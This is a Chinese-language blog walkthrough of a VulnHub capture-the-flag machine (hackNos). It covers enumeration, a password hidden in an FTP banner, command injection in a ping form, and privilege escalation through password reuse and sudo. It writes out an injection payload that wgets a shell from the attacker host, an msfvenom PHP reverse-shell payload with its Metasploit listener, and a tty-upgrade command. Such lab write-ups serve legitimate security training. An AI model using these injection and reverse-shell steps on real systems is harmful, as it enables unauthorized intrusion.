更新:2020-01-23,今天查看了一下靶機作者寫的walkthrough,關於admin密碼的解釋如下:
有點意外,不帶這麼玩的……有可能是靶機版本的問題,因爲靶機有時候會更新。
目標資產信息蒐集的程度,決定滲透過程的複雜程度。
目標主機信息蒐集的深度,決定後滲透權限持續把控。
滲透的本質是信息蒐集,而信息蒐集整理爲後續的情報跟進提供了強大的保證。----Micropoor
難度:簡單-中等
靶機發布日期:2020年1月11日
靶機描述:Good Enumeration Skills
Difficulty: Easy to Intermediate
Flag: 2 Flag first user And the second root
Learning: Web Application | Enumeration | Privilege Escalation
Web-site: www.hacknos.com
Contact-us
Twitter: @rahul_gehlaut
博客中如有任何問題,懇請批評指正,萬分感謝。個人郵箱:[email protected]
工具、知識點和漏洞
- nmap
- gobuster
- metasploit
- msfvenom
- burpsuite
- 命令注入
0x00、信息收集
靶機IP:192.168.56.101
nmap -sn 192.168.56.0/24
端口和服務
nmap -sS -T5 -A -p- 192.168.56.101
頁面、目錄枚舉
gobuster dir -u http://192.168.56.101 -w ~/Desktop/SecLists/Discovery/Web-Content/raft-large-directories.txt -x .php,html,.txt,.zip,.tar.gz,.git,.svn
FTP可匿名登錄,登錄之後發現文件夾裏沒有任何東西。
網站首頁
點擊“TroubleShoot”,彈出認證框,Burpsuite抓包之後發現使用的是HTTP的Basic認證。
關於Basic認證的暴力破解方法參考:https://www.hackingarticles.in/multiple-ways-to-exploiting-http-authentication/
vsFTPd 3.0.3,無相關可利用漏洞。
Burpsuite抓包,沒發現什麼可疑內容。
Wireshark抓取流量包,還是沒有發現什麼可疑內容。
git信息泄露:使用Githack掃描工具未檢測到git信息泄露。
svn信息泄露:使用SvnExploit.py工具未檢測到svn信息泄露。
.DS_Store文件泄露:使用ds_store_exp工具未檢測到.DS_Store文件泄露。
嘗試收集備份文件,無果。
hydra爆破一下SSH,因爲沒有用戶名,所以成功的概率應該不大。
查看網頁源代碼也沒發現什麼。
關於信息收集的文章:
到目前爲止能想到的就是要麼通過某種方法獲取到SSH的登錄賬號和密碼,要麼是獲取到http://192.168.56.101/5ecure/的登錄賬號和密碼。但沿着這個思路已經不知道怎麼繼續下去了,然後到Twitter上問了一下,得知The FTP-banner holds password,見下圖:
然後以爲Secure@hackNos就是密碼。關於登錄賬號猜測不是root就是admin,試來試去還是沒能成功登錄。最後得知密碼是Security@hackNos。想了一下應該是"Secure@hackNos"和"Recon Security"組合了一下。
0x01、getshell
登錄進入看到Ping_Scan就想到了命令執行
ip=127.0.0.1&&ls&Submit=Ping_Scan# 只有Ping結果ip=127.0.0.1|ls&Submit=Ping_Scan# 列出了當前目錄的文件
直接讀取一下out.php的內容,可能過濾規則就在這個文件裏面,luck boy!!!
這裏直接通過wget下載我們的shell.php到靶機上,然後檢查了一下,發現確實下載了。
ifconfig命令查看kali的IP
msfvenom生成webshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=1234 R > shell.php
!!!注意:使用時需要去掉最開頭的兩個字符/*,不然瀏覽器訪問反彈shell的php網頁會看到/*,並且無法反彈shell.
msfvenom默認是無法自動補全的,網上有相關的教程,有需要可自行搜索
ip=127.0.0.1|wget http://192.168.56.102/shell.php&Submit=Ping_Scan
msfconsole做好接收反彈的shell的準備
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.56.102
set lport 1234
run
瀏覽器訪問shell.php(http://192.168.56.101/5ecure/shell.php)觸發反彈shell的代碼。
獲取shell之後要做的第一件事是使用Python獲取一個tty,不然有些命令是無法執行的,這一步很關鍵。
python -c 'import pty; pty.spawn("/bin/bash")' # 有些沒有安裝Python2,所以需要換成python3 -c
如果你想使用clear清屏,那麼只需要給TERM這個環境變量賦值screen即可
export TERM=screen # 賦值xterm也可以
0x02、權限提升
--------------------------------------------------------------Begin 套話分割線 Begin--------------------------------------------------------------
關於Linux提權,可以直接用腳本蒐集一下對於提權有用的信息,比如用linuxprivchecker.py、LinEnum.sh.
如果你想熟悉一下沒有腳本的情況下怎麼收集這些信息可以參考privilege_escalation_-_linux
先在kali上開啓HTTP服務
python -m SimpleHTTPServer 65534
使用wget下載linuxprivchecker.py腳本到靶機的tmp目錄
因爲本人所在的地理位置不允許直接訪問Github,所以我是從自己的kali下載的
cd /tmp
wget http://192.168.0.108:65534/Desktop/linuxprivchecker.py
爲了便於查看收集到的信息,我將結果輸出到report.txt文本中,之後使用less查看
python linuxprivchecker.py > report.txt
less report.txt
靶機做了這些後發現還是手動收集更快……,手動收集不到有效信息的情況下再嘗試用腳本。
-------------------------------------------------------------- End 套話分割線 End --------------------------------------------------------------
先拿到user的flag
又是docker提權嗎?
SUID權限可執行文件,沒有可用的
find / -perm -u=s -type f 2>/dev/null
常見的SUID提權可執行文件
- nmap
- vim
- less
- more
- nano
- cp
- mv
- find
- wget
- bash
查找sudo權限命令,需要密碼。
sudo -l
查看計劃任務,無。
cat /etc/crontab
[貓貓靈機一動]這裏猜測了一下之前獲取的Security@hackNos會不會也是recon用戶的密碼,結果還真是。倒是跟“撞庫”的思路一模一樣。這裏千萬不要覺得不可思議或者說瞧不起這種操作。如果你真的有這種想法,那麼只需要問自己一個問題,“我有多少個賬號的密碼是一樣的”,就可以了。
sudo -l發現可以執行任意用戶權限的任意命令……
recon用戶屬於docker用戶組,所以用docker提權應該也可以。這裏就不寫了,同系列的上一篇『VulnHub系列』hackNos: Os-hackNos-3-Walkthrough就是用docker進行提權,可以參考一下。
0x03、關於admin的密碼
我這隻能說,這是直覺……
如果你有其他的方法,歡迎留言。要是有寫錯了的地方,請你一定要告訴我。要是你覺得這篇博客寫的還不錯,歡迎分享給身邊的人。掃描下方微信二維碼與我交流。我是ins1ght.
